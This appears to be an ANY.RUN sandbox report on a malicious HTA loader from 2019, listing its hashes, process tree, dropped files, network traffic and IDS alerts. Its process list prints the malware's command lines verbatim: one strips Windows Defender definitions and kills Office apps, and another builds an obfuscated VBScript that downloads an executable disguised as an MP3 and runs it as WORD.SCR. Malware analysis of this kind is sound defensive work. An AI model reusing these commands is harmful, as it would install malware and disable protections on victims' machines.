File name:

MicoSSD.hta

Full analysis: https://app.any.run/tasks/5dbaf447-e68f-4c7a-8edf-e111c86d2fa2
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 22, 2019, 13:26:48
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5:

F44EC6FC72169568A47270BED252AFEC

SHA1:

DB80EB1A7C2583F505AB02F13C69A1AD78F68E6C

SHA256:

33B406BF112820CA7A94377D928A4EB99CE27D1E4518A11EB3938D1E0A9410DD

SSDEEP:

48:np3dUQIwe/weqweIwe0wwesYzwejweJweObwZ2we/wepwLFwe6xweOweZweUweYI:pdUNwIwlwbw+wN4wawywVbwwwSw2wJwB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2440)
    • Application was dropped or rewritten from another process

      • WORD.SCR (PID: 2100)
    • Downloads executable files from the Internet

      • WScript.exe (PID: 3752)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2848)
      • cmd.exe (PID: 2440)
    • Application launched itself

      • cmd.exe (PID: 2440)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2104)
    • Starts application with an unusual extension

      • cmd.exe (PID: 2440)
    • Creates files in the user directory

      • WScript.exe (PID: 3752)
    • Executes scripts

      • cmd.exe (PID: 2440)
    • Executable content was dropped or overwritten

      • WScript.exe (PID: 3752)
    • Connects to unusual port

      • WORD.SCR (PID: 2100)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
11
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start mshta.exe no specs cmd.exe no specs mpcmdrun.exe no specs taskkill.exe no specs taskkill.exe no specs cmd.exe no specs ping.exe no specs cmd.exe no specs wscript.exe timeout.exe no specs word.scr

Process information

PID
CMD
Path
Indicators
Parent process
1836timeout 12 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2100WORD.scrC:\Users\admin\AppData\Local\Temp\WORD.SCR
cmd.exe
User:
admin
Company:
席席是 她成族司望
Integrity Level:
MEDIUM
Description:
希商的是是 太席的的
Exit code:
0
Version:
5.8.7.5
Modules
Images
c:\users\admin\appdata\local\temp\word.scr
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2104"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2224cMd /c cd C:\Users\admin\AppData\Local\Temp C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2440"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & cMd /c cd C:\Users\admin\AppData\Local\Temp &@echo T5k = "http://gvcenterhotel.com.br/AcrobatDocument.mp3">>Microsoft.vbs &@echo A5z = Y6k("YQTF0UET")>>Microsoft.vbs &@echo Set AdobE = CreateObject(Y6k("OUZON40ZONJVVR"))>>Microsoft.vbs &@echo AdobE.Open Y6k("IGV"), T5k, False>>Microsoft.vbs &@echo AdobE.send ("")>>Microsoft.vbs &@echo Set Acrobat = CreateObject(Y6k("CFQFD0UVTGCO"))>>Microsoft.vbs &@echo Acrobat.Open>>Microsoft.vbs &@echo Acrobat.Type = 1 >>Microsoft.vbs &@echo Acrobat.Write AdobE.ResponseBody>>Microsoft.vbs & @echo Acrobat.Position = 0 >>Microsoft.vbs &@echo Acrobat.SaveToFile A5z, 2 >>Microsoft.vbs &@echo Acrobat.Close>>Microsoft.vbs &@echo function Y6k(R0b) >> Microsoft.vbs &@echo For T7z = 1 To Len(R0b) >>Microsoft.vbs &@echo M1m = Mid(R0b, T7z, 1) >>Microsoft.vbs &@echo M1m = Chr(Asc(M1m)- 2) >>Microsoft.vbs &@echo Y9c = Y9c + M1m >> Microsoft.vbs &@echo Next >>Microsoft.vbs &@echo Y6k = Y9c >>Microsoft.vbs &@echo End Function >>Microsoft.vbs& Microsoft.vbs &dEl Microsoft.vbs & timeout 12 & WORD.scrC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2536MpCmdRun.exe -removedefinitions -dynamicsignatures C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows defender\mpcmdrun.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2848"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\MicoSSD.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
3080ping 127.0.0.1 -n 10 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
3104taskkill /f /im excel.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
3176taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
Total events
524
Read events
498
Write events
26
Delete events
0

Modification events

(PID) Process:(2848) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2848) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2440) cmd.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2440) cmd.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3752) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3752) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3752) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3752) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3752) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3752) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
2
Suspicious files
0
Text files
21
Unknown types
1

Dropped files

PID
Process
Filename
Type
2536MpCmdRun.exeC:\Users\admin\AppData\Local\Temp\MpCmdRun.logtext
MD5:
SHA256:
2440cmd.exeC:\Users\admin\AppData\Local\Temp\Microsoft.vbstext
MD5:
SHA256:
3752WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\AcrobatDocument[1].mp3executable
MD5:
SHA256:
3752WScript.exeC:\Users\admin\AppData\Local\Temp\WORD.SCRexecutable
MD5:
SHA256:
3752WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
6
DNS requests
5
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3752
WScript.exe
GET
200
192.185.214.91:80
http://gvcenterhotel.com.br/AcrobatDocument.mp3
US
executable
415 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2100
WORD.SCR
152.240.225.115:5155
systenfailued.ddns.com.br
TELEFÔNICA BRASIL S.A
BR
unknown
3752
WScript.exe
192.185.214.91:80
gvcenterhotel.com.br
CyrusOne LLC
US
malicious
2100
WORD.SCR
152.240.225.115:4066
systenfailued.ddns.com.br
TELEFÔNICA BRASIL S.A
BR
unknown
2100
WORD.SCR
152.240.225.115:4984
systenfailued.ddns.com.br
TELEFÔNICA BRASIL S.A
BR
unknown

DNS requests

Domain
IP
Reputation
gvcenterhotel.com.br
  • 192.185.214.91
malicious
systenfailued.ddns.com.br
  • 152.240.225.115
unknown
dns.msftncsi.com
  • 131.107.255.255
shared
internetexploter.duckdns.org
  • 152.240.225.115
malicious

Threats

PID
Process
Class
Message
3752
WScript.exe
A Network Trojan was detected
ET TROJAN EXE Download When Server Claims To Send Audio File - Must Be Win32
3752
WScript.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3752
WScript.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
1052
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
No debug info